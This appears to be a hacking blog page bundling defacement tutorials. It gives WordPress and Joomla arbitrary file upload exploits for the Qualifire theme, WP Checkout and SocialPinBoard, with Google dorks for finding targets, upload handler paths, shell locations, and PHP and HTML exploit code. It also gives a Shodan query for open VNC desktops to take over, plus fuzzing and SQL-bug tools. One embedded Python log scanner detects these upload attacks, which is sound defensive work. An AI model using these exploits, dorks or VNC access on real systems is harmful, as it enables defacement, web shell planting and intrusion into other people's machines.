Deface WordPress with the Qualifire theme file upload exploit

Yup, it's been a while since I shared a deface exploit; honestly I don't really like defacing, hehe. This time I want to share a tutorial on defacing WordPress with the Qualifire Themes File Upload Vulnerability exploit. The exploit is actually quite old, but for some reason it has "bloomed again" now. Okay, no need to drag this out, let's get straight to it.
Materials:
HTML exploit: download
Google Dorks:
inurl:"/wp-content/themes/qualifire"
Use your brain, bitch!
Vuln:
/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Save the exploit above in .html format. Don't forget to replace the URL with the target URL.
Then open the exploit file in a browser.


Your shell will be at localhost/shell.php
Since it lands directly in public_html, if you only want to deface, you can upload the script directly.

That's it for this WordPress deface tutorial using the Qualifire Themes File Upload Vulnerability exploit; happy exploiting.

Tools for information gathering
For those who like poking around websites, Mr.Loop is sharing this one. It's called AngryFuzzer.
AngryFuzzer - a tool for information gathering
angryFuzzer
AngryFuzz3r is a collection of pentesting tools for gathering information and finding vulnerabilities in a target, based on the FuzzDB project https://github.com/fuzzdb-project/fuzzdb
UrlFuzz3r-> AngryFuzz3r_1

Find hidden files and directories on a web server. The application tries to find relative URL paths of the given website by comparing them against a given wordlist.
Features


Usage

$ python angryFuzzer.py -h
Usage: angryFuzzer.py [options]

Options:
  -h, --help            show this help message and exit
  -q, --quiet           Silent mode ,only repport
  -u URL, --url=URL      URL of the Target
  -c CMS, --cms=CMS     scan CMS ==> wp ,dp
  -w WORDLIST, --wordlist=WORDLIST
                        Custom wordlist
Example:
  • Fuzzing a URL with the default dictionary
python angryFuzzer.py -u https://127.0.0.1
  • Fuzzing a CMS (wp in this example!)
python angryFuzzer.py -u https://127.0.0.1 --cms wp
  • Fuzzing with a custom wordlist
python angryFuzzer.py -u https://127.0.0.1 -w fuzzdb/discovery/predictable-filepaths/php/PHP.txt

How to install

$ git clone https://github.com/ihebski/angryFuzzer.git
$ cd angryFuzzer
$ python angryFuzzer.py
DOWNLOAD

Latest tool for finding SQL bugs
Hello Mr.Loop friends, I'm going to share a no-fuss pentesting tool for those who want to hunt for SQL bugs. This tool was actually released 4 weeks ago, and now I want to share it.
The tool is called viSQL; first take a look at how to install it:

viSQL - Scan for SQL vulnerabilities on the target site and on other sites hosted on the same server

viSQL
Installation
~$ git clone https://github.com/blackvkng/viSQL.git
~$ cd viSQL
~# python2 -m pip install -r requirements.txt
~$ python2 viSQL.py --help
OR you can also grab it from here:
DOWNLOAD

How to Install Python on Windows

Python is a simple, reliable high-level programming language intended for desktop and web services.

How to install Python on Windows
First, download the Python installer from the official site HERE. Versions 2 and 3 actually do the same job; there are only small differences in syntax, and for further reference you can read up on Google 😄. This time I'm choosing version 2.7.13.

Once the download has finished, double-click the Python installer file.

Choose Install for all users so that Python is available to all Windows accounts (Administrator and guest). Then click Next.
Next, choose the installation folder for Python, or leave the default, which installs to Local Disk C.
Then click Next.

Just click Next.

Wait for the installation to finish.

The last step is to click Finish; Python is now successfully installed on your Windows machine.

How to Deface WordPress via the WP Checkout Plugin - Arbitrary File Upload

WordPress Plugins WP Checkout - Arbitrary File Upload


# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/

2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
If it is vulnerable, the page is blank.

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Resulting file location:
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html

Joomla SocialPinBoard Arbitrary File Upload

#Title: SocialPinBoard AFU (Arbitrary File Upload)
#Author: Con7ext
#Tested on: Windows XP and Linux Ubuntu
#Dork:
#inurl:/index.php?option=com_socialpinboard
#Powered By Socialpinboard
#index of /mod_socialpinboard_menu/
#index of /socialpinboard/
#inurl:/modules/ "Socialpinboard"
################################
Path of exploit:
/modules/mod_socialpinboard_menu/saveimagefromupload.php
or
/modules/mod_socialpinboard_menu/upload-file.php
Path of shell: /modules/mod_socialpinboard_menu/images/socialpinboard/temp/RANDOMresult.php

Exploit (PHP):
<?php
$uploadfile="low.php";
$ch = curl_init("http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$uploadfile")); // closing parenthesis was missing in the original listing
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Exploit (HTML):
<html>
<body>
<form method="POST" action="http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php" enctype="multipart/form-data">
<input type="file" name="uploadfile" /><button>Upload</button>
</form>
</body>
</html>
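All three write-ups above (the Qualifire theme, the WP Checkout plugin and the Joomla SocialPinBoard module) describe the same pattern: an unauthenticated POST to an upload handler, then a request for the dropped .php file. The following detection script is an added example, not part of any of these posts; it scans web server access log lines for that pattern, the log lines are constructed sample data, and the rule names are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Upload handlers named in the three write-ups on this page. An unauthenticated
# POST to one of these is worth an alert on its own.
VULNERABLE_UPLOAD_HANDLERS = (
    "/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php",
    "/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php",
    "/modules/mod_socialpinboard_menu/saveimagefromupload.php",
    "/modules/mod_socialpinboard_menu/upload-file.php",
)

# Directories the write-ups say uploaded files land in. A request for a .php
# file underneath one of them is the second half of the pattern: execution of
# whatever was just dropped.
UPLOAD_DIRS = (
    "/wp-content/uploads/wp-checkout/uploadify/",
    "/modules/mod_socialpinboard_menu/images/socialpinboard/temp/",
)

# Apache/Nginx combined-style access log line (assumed format), e.g.
# 203.0.113.5 - - [10/Oct/2017:13:55:36 +0000] "POST /x.php HTTP/1.1" 200 512
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2017:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2017:13:55:40 +0000] "POST /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 18
203.0.113.5 - - [10/Oct/2017:13:55:44 +0000] "GET /shell.php HTTP/1.1" 200 7742
198.51.100.7 - - [10/Oct/2017:14:01:58 +0000] "GET /wp-content/plugins/wp-checkout/vendors/uploadify/upload.php HTTP/1.1" 200 0
198.51.100.7 - - [10/Oct/2017:14:02:01 +0000] "POST /wp-content/plugins/wp-checkout/vendors/uploadify/upload.php HTTP/1.1" 200 0
198.51.100.7 - - [10/Oct/2017:14:02:05 +0000] "GET /wp-content/uploads/wp-checkout/uploadify/random-file.php HTTP/1.1" 200 311
192.0.2.9 - - [10/Oct/2017:14:10:11 +0000] "GET /wp-content/uploads/2017/10/photo.jpg HTTP/1.1" 200 40211
"""


@dataclass(frozen=True)
class Finding:
    ip: str
    timestamp: str
    rule: str
    path: str


def classify(method: str, path: str) -> Optional[str]:
    """Return the rule a single request matches on its own, or None."""
    clean = path.split("?", 1)[0].lower()   # match on the path only, case-folded
    if clean in VULNERABLE_UPLOAD_HANDLERS:
        # The WP Checkout post checks vulnerability with a plain GET first
        # (blank page), so a GET is a probe and a POST is the upload itself.
        return "upload-to-vulnerable-handler" if method == "POST" else "probe-of-vulnerable-handler"
    if clean.endswith(".php") and any(clean.startswith(d) for d in UPLOAD_DIRS):
        return "php-executed-from-upload-dir"
    return None


def scan_log(lines) -> List[Finding]:
    """Scan access log lines, correlating uploads with later PHP requests per client."""
    findings: List[Finding] = []
    uploaders = set()   # client IPs that have already POSTed to a vulnerable handler
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # not a combined-format line; skip rather than guess
        ip, path = m["ip"], m["path"]
        rule = classify(m["method"], path)
        if rule is None and ip in uploaders and path.split("?", 1)[0].lower().endswith(".php"):
            # Same client fetching PHP after an upload. The Qualifire post says
            # the dropped file appears as /shell.php in the web root, so no
            # fixed directory can be matched there; the correlation catches it.
            rule = "php-request-after-upload"
        if rule == "upload-to-vulnerable-handler":
            uploaders.add(ip)
        if rule:
            findings.append(Finding(ip, m["ts"], rule, path))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f.timestamp}  {f.ip:<14} {f.rule:<32} {f.path}")
```

Pointing the scanner at a real log only requires feeding it an iterable of lines; a hit on the upload rule followed by a PHP request from the same client is the sequence to treat as a probable web shell drop.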

Fresh WordPress dorks 2017

Fresh WordPress Dorks 2017-2018

Grab them, go ahead:
For those who play with WP :v just grab them, bro :P



Remote PC with VNC + Shodan

Mr.Loop wants to tell his beloved friends a secret, heheh: remoting into a PC over VNC, but Mr.Loop uses shodan.io.
1. First, you need to log in at https://www.shodan.io
2. Second, enter the dork in the search box ( has_screenshot:true port:5900 ); feel free to edit it with your Einstein brain, hehe. You can add (country:my) or whichever country you like: id, us, ...

3. After searching, lots of results will appear, like the image below.

4. Then go in, ta-da... once it's like this we can tinker, heheh 😂. Okay, that's all from Mr.Loop 👍